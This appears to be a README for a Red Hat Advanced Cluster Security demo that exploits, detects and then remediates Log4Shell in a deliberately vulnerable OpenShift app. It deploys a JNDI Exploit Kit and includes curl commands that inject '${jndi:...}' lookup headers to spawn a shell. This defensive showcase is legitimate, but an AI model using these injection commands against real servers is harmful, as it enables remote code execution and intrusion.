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A demo of Red Hat Advanced Cluster Security

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Red Hat ACS demo

This repository is a demo for Red Hat Advanced Cluster Security that shows its benefits in the context of a major vulnerability such as Log4Shell.

The high level scenario of the demo is:

  • An application is vulnerable to Log4Shell and deployed to production
  • The vulnerability is announced
  • A policy is loaded to track vulnerable applications and drive the remediation process
  • Tickets are opened automatically on Jira to notify developers
  • However, the developers need time to properly update the Log4j library
  • The operations people will implement the remediation in the meantime
  • The developers will notice their CI process is stopped because of the critical vulnerability
  • They update the version of the Log4j dependency
  • The CI/CD process builds and deploy the final fix for the CVE

From this demo we can conclude that Red Hat ACS can:

  • Detect major CVEs when they appear
  • Drive a remediation campaign
  • Identify the current version of each component of a container image
  • Detect intrusion in the information system
  • Warn developers that their application is vulnerable to a CVE
  • Ensure security and quality of software delivery


0. Verify pre-requisites

On your workstation:

  • podman
  • buildah
  • git
  • curl
  • oc
  • ansible

On your OpenShift cluster(s):

  • Red Hat ACS
  • OpenShift Pipelines

Create three namespaces for the demo.

oc new-project vulnerable-cicd
oc new-project vulnerable-log4j
oc new-project exploitkit-log4j

1. Jira

  • Create a Jira trial account at:

  • Write down the URL of your dashboard.

  • Click Jira Software in the top left corner

  • Click See all projects in the top right corner

  • Click Create project

  • Select the Bug tracking template

  • Choose a name and a key

  • Write down the chosen key

  • Go to and create an API Token.

  • Login to the Central and drill down to Platform configuration > Integrations.

  • Select Jira software.

  • Click New integration.

  • Fill-in the creation form with:

    • Integration Name: Jira
    • Username: your Jira username
    • Password: your Jira API Token
    • Issue Type: Task
    • Default Project: your Jira project Key (all upper case)
  • Click Test and Save

Save the Jira API key to the Ansible Vault:

ansible-vault create cleanup/ansible-vault.yaml

Seize the opportunity to also add your Central admin password and hostname.

jira_password: foo
central_admin_password: bar

2. Expose the registry

Expose the OpenShift registry.

oc create route reencrypt image-registry --service=image-registry -n openshift-image-registry
REGISTRY=$(oc get route -n openshift-image-registry image-registry -o jsonpath={})

Set the registry hostname where required.

sed -i.bak "s/__REGISTRY__/$REGISTRY/" remediation/Dockerfile deployment/kustomization.yaml cicd/80-pipeline.yaml

3. Deploy the CI/CD pipeline

Deploy the CI/CD pipeline.

oc apply -f cicd

Let podman push remediated images.

oc adm policy add-role-to-user admin -z default -n vulnerable-cicd

Open the Central and:

  • Drill down to Platform configuration > Integration.
  • Select API Token.
  • Click Generate token.
  • Fill-in the Token name with Tekton.
  • Select the Role Continuous Integration.
  • Click Generate.
  • Write down the generated token.

Create a Kubernetes secret with this token:

oc create secret generic central-apitoken -n vulnerable-cicd --from-literal=rox_api_token=<TOKEN> --from-literal=rox_central_endpoint=central-stackrox.apps.$CLUSTER_DOMAIN_NAME:443

Get the registry hostname and default token.

# Get the hostname...
oc get route -n openshift-image-registry image-registry -o jsonpath={}

# and the password.
oc serviceaccounts get-token -n vulnerable-cicd default

Create the Docker Registry integration in Central with the above information.

Add an enforcement exception for the Fixable Severity at least important policy:

  • Drill down to Platform configuration > System policy
  • Select the policy Fixable Severity at least important
  • Click Edit
  • In the excluded image, add <REGISTRY>/vulnerable-cicd/vulnerable-log4j (you will have to select the last option of the list: Create ...)
  • Save the policy

4. Prepare for deployment

Give access to the vulnerable-cicd images from the vulnerable-log4j namespace.

oc get secrets -n vulnerable-cicd -o json | jq -r '.items[] | select(.metadata.annotations[""]=="default" and .type=="") | .data[".dockercfg"]' | base64 -d | jq --arg registry "$REGISTRY" '.["image-registry.openshift-image-registry.svc:5000"] as $conf | { ($registry) : $conf}' > dockercfg
oc apply -n vulnerable-log4j -f - <<EOF
kind: Secret
apiVersion: v1
  name: external-registry
  .dockercfg: $(base64 -w0 dockercfg)
oc secrets link default external-registry --for=pull -n vulnerable-log4j

5. Deploy the Exploit

Deploy the JNDI Exploit Kit.

oc apply -f exploit/deployment


From your workstation, verify the connection to the registry:

REGISTRY=$(oc get route -n openshift-image-registry image-registry -o jsonpath={})
REGISTRY_TOKEN="$(oc get secrets -n vulnerable-cicd -o json | jq -r '.items[] | select(.metadata.annotations[""]=="default" and .type=="") | .data[".dockercfg"]' | base64 -d | jq -r --arg registry "$REGISTRY" '.["image-registry.openshift-image-registry.svc:5000"].password')"
podman login "$REGISTRY" --username sa --password "$REGISTRY_TOKEN"

Run the cleanup script.

ansible-playbook cleanup/cleanup.yaml

Deploy the vulnerable app.

oc kustomize deployment | oc apply -f -

Demo scenario

Build the inventory

  • Open the Central
  • Drill down to Platform Configuration > System policies
  • Click Import policy
  • Load policy/log4shell.json
  • Open the Violations tab
  • Filter by Policy: Log4Shell


In a hidden terminal, run the JNDI Exploit Kit to trigger the "Shell spawned by Java application" policy

  • Get the RMI URL with:

    oc logs -n exploitkit-log4j deploy/jndi-exploit-kit |grep -A1 "BYPASS WITH EL by @welk1n"
    EXPLOIT_URL="$(oc logs -n exploitkit-log4j deploy/jndi-exploit-kit | grep -A1 "BYPASS WITH EL by @welk1n" | grep rmi:// | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g')"
  • Find the URL of the vulnerable container.

    export TARGET="https://$(oc get route settlement-app -n vulnerable-log4j -o jsonpath="{}")/"
  • Send the exploit

    curl "$TARGET" -H "X-Name: \${jndi:$EXPLOIT_URL}"

Then, show the violation:

  • Open the Violations tab
  • Filter by Namespace: vulnerable-log4j
  • Go to the OpenShift console
  • Select the vulnerable-log4j namespace
  • Delete the pod
  • In the Central, clear the Violation
  • Drill down to Platform Configuration > System policies
  • Open the Shell Spawned by Java Application policy
  • Click the Edit button
  • On the fourth tab, show the automatic enforcement options


podman build --pull-always -t $REGISTRY/vulnerable-cicd/vulnerable-log4j:latest remediation
podman run -it --rm --name test -p 8080:8080 $REGISTRY/vulnerable-cicd/vulnerable-log4j:latest
curl http://localhost:8080 -H 'X-Name: ${jndi:ldap://}'
podman push $REGISTRY/vulnerable-cicd/vulnerable-log4j:latest
oc delete pods -l deployment=settlement-app -n vulnerable-log4j

The violation "Log4Shell" disappeared.

Final fix by the developers

Start the CI/CD pipeline:

  • In the OpenShift developer console, navigate to the vulnerable-cicd namespace.
  • Drill down to Pipelines
  • Select vulnerable-log4j
  • Click Actions > Start

It fails because the current version is vulnerable.

Edit src/pom.xml and change <log4j.version>2.14.0</log4j.version> to <log4j.version>2.17.1</log4j.version>.

git add src/pom.xml
git commit -m 'fix log4shell cve'
git push

Restart the CI/CD pipeline.

Reset the demo

In Jira, mark all tickets as closed.

Edit src/pom.xml and change <log4j.version>2.17.1</log4j.version> to <log4j.version>2.14.0</log4j.version>.

git add src/pom.xml
git commit -m 'reset the demo'
git push


oc kustomize deployment | oc delete -f -
oc delete pods,builds,pipelineruns -n vulnerable-cicd --all
oc start-build vulnerable-log4j -n vulnerable-cicd


A demo of Red Hat Advanced Cluster Security






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  • Java 51.5%
  • Dockerfile 48.5%